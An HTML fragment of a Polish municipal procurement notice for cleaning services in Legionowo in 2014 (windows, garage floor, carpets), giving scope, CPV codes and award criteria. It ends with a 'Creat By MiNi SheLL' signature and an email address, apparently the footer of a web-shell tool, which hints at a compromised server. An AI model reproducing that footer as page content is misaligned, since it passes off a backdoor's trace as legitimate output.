<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - Świadczenie usługi mycia wewnętrznego i zewnętrznego okien i powierzchni szklanych na potrzeby Urzędu Miasta Legionowo w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. J. Piłsudskiego 41 w Legionowie oraz w hali Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług mycia wewnętrznego i zewnętrznego okien 
i powierzchni szklanych na potrzeby Urzędu Miasta Legionowo w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. J. Piłsudskiego 41 w Legionowie oraz w hali Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie
2. Zamawiający przewiduje jednokrotne wykonanie usługi w terminie marzec/kwiecień 2014 r.
3. Koszty zużycia energii elek., zużycia wody i odprowadzenia ścieków ponosi Zamawiający.
4. Szczegółowy termin realizacji przedmiotu zamówienia zostanie ustalony z 2 tygodniowym wyprzedzeniem.
5. Usługa może być świadczona od piątku od godziny 16:00 do niedzieli. Wykonawca zrealizuje usługę jednorazowo dla każdego obiektu w terminie do 14 dni od daty zlecenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.13.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III - Świadczenie kompleksowej usługi maszynowego czyszczenia posadzki garażu podziemnego w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. 
J. Piłsudskiego 41 w Legionowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie kompleksowej usługi maszynowego czyszczenia posadzki garażu obejmującej zamiatanie, maszynowe czyszczenie oraz czyszczenie kratek odpływowych w garażu podziemnym w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. J. Piłsudskiego 41 w Legionowie.
2. Szacunkowa powierzchnia garażu podziemnego w budynku Centrum Informacyjno-Administracyjnego wynosi 1.700 m2
3. Garaż podziemny posiada nawierzchnie z masy żywic poliuretanowych ISPO.
4. Podana powierzchnia ma charakter szacunkowy, służy w celu porównania ofert pod względem cenowym i nie stanowi wynagrodzenia Wykonawcy.
5. Zamawiający w okresie trwania umowy przewiduje 2 krotne mycie garażu w budynku Centrum Informacyjno- Administracyjnego.
6. Koszty zużycia energii elektrycznej, zużycia wody i odprowadzenia ścieków ponosi Zamawiający.
7. Planowane terminy wykonania usługi:
1)  I termin marzec/kwiecień 2014r.;
2)  II termin wrzesień/październik 2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV - Świadczenie usługi czyszczenia wykładzin na potrzeby Urzędu Miasta Legionowo w budynku Centrum Informacyjno-Administracyjnego przy ul. marsz. 
J. Piłsudskiego 41 w Legionowie oraz w hali Arena Legionowo przy ul. B. Chrobrego 50B 
w Legionowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenia usługi czyszczenia wykładzin dywanowych w pomieszczeniach biurowych i na korytarzach w budynku Centrum Informacyjno-Administracyjnego oraz w hali widowiskowo-sportowej Arena Legionowo przy ul. B. Chrobrego 50B w Legionowie.
2. Szacunkowa powierzchnia czyszczenia wykładzin wynosi: 2.000 m2. 
3 Podana powierzchnia ma charakter szacunkowy, służy w celu porównania ofert pod względem cenowym i nie stanowi wynagrodzenia Wykonawcy.
4. Świadczenie usługi będzie wynikało z bieżącego zapotrzebowania Zamawiającego. Usługa będzie świadczona sukcesywnie na podstawie pisemnego zapotrzebowania Zamawiającego.
5. Koszty zużycia energii elektrycznej, zużycia wody i odprowadzenia ścieków ponosi Zamawiający.
6. Usługa może być świadczona w dniach od piątku (od godziny 16:00) do niedzieli (do godziny 22:00)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com